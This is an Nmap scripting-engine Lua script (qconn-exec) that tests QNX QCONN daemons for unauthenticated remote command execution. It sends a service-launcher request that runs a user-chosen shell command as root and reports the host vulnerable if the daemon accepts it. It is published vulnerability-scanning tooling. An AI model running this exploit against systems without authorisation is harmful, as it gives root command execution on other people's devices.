1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
|
local comm = require("comm")
local vulns = require("vulns")
local stdnse = require("stdnse")
local string = require("string")
local shortport = require("shortport")
description = [[
Attempts to identify whether a listening QNX QCONN daemon allows
unauthenticated users to execute arbitrary operating system commands.
QNX is a commercial Unix-like real-time operating system, aimed primarily at
the embedded systems market. The QCONN daemon is a service provider that
provides support, such as profiling system information, to remote IDE
components. The QCONN daemon runs on port 8000 by default.
For more information about QNX QCONN, see:
* http://www.qnx.com/developers/docs/6.3.0SP3/neutrino/utilities/q/qconn.html
* http://www.fishnetsecurity.com/6labs/blog/pentesting-qnx-neutrino-rtos
* http://www.exploit-db.com/exploits/21520
* http://metasploit.org/modules/exploit/unix/misc/qnx_qconn_exec
]]
---
-- @usage
-- nmap --script qconn-exec --script-args qconn-exec.timeout=60,qconn-exec.bytes=1024,qconn-exec.cmd="uname -a" -p <port> <target>
--
-- @output
-- PORT STATE SERVICE VERSION
-- 8000/tcp open qconn qconn remote IDE support
-- | qconn-exec:
-- | VULNERABLE:
-- | The QNX QCONN daemon allows remote command execution.
-- | State: VULNERABLE
-- | Risk factor: High
-- | Description:
-- | The QNX QCONN daemon allows unauthenticated users to execute arbitrary operating
-- | system commands as the 'root' user.
-- |
-- | References:
-- | http://www.fishnetsecurity.com/6labs/blog/pentesting-qnx-neutrino-rtos
-- |_ http://metasploit.org/modules/exploit/unix/misc/qnx_qconn_exec
--
-- @args qconn-exec.timeout
-- Set the timeout in seconds. The default value is 30.
--
-- @args qconn-exec.bytes
-- Set the number of bytes to retrieve. The default value is 1024.
--
-- @args qconn-exec.cmd
-- Set the operating system command to execute. The default value is "uname -a".
--
-- @changelog
-- 2012-10-07 - Created - created by Brendan Coles - itsecuritysolutions.org
-- 2013-07-28 - Revised - allow users to specify arbitrary commands
-- - now uses the vuln library for reporting
author = "Brendan Coles"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"intrusive", "exploit", "vuln"}
portrule = shortport.port_or_service ({8000}, "qconn", {"tcp"})
action = function( host, port )
local vuln_table = {
title = "The QNX QCONN daemon allows remote command execution.",
state = vulns.STATE.NOT_VULN,
risk_factor = "High",
description = [[
The QNX QCONN daemon allows unauthenticated users to execute arbitrary operating
system commands as the 'root' user.
]],
references = {
'http://www.fishnetsecurity.com/6labs/blog/pentesting-qnx-neutrino-rtos',
'http://metasploit.org/modules/exploit/unix/misc/qnx_qconn_exec'
}
}
-- Set socket timeout
local timeout = (stdnse.parse_timespec(stdnse.get_script_args(SCRIPT_NAME .. ".timeout")) or 30)
-- Set max bytes to retrieve
local bytes = (stdnse.get_script_args(SCRIPT_NAME .. '.bytes') or 1024)
-- Set command to execute
local cmd = (stdnse.get_script_args(SCRIPT_NAME .. '.cmd') or "uname -a")
-- Send command as service launcher request
local req = string.format("service launcher\nstart/flags run /bin/sh /bin/sh -c \"%s\"\n", cmd)
stdnse.debug1("Connecting to %s:%s", host.targetname or host.ip, port.number)
local status, data = comm.exchange(host, port, req, {timeout=timeout*1000,bytes=bytes})
if not status then
stdnse.debug1("Timeout exceeded for %s:%s (Timeout: %ss).", host.targetname or host.ip, port.number, timeout)
return
end
-- Parse response
stdnse.debug2("Received reply:\n%s", data)
if not string.match(data, "QCONN") then
stdnse.debug1("%s:%s is not a QNX QCONN daemon.", host.targetname or host.ip, port.number)
return
end
-- Check if the daemon attempted to execute the command
if string.match(data, 'OK [0-9]+\r?\n') then
vuln_table.state = vulns.STATE.VULN
local report = vulns.Report:new(SCRIPT_NAME, host, port)
return report:make_output(vuln_table)
else
stdnse.debug1("%s:%s QNX QCONN daemon is not vulnerable.", host.targetname or host.ip, port.number)
return
end
end
|
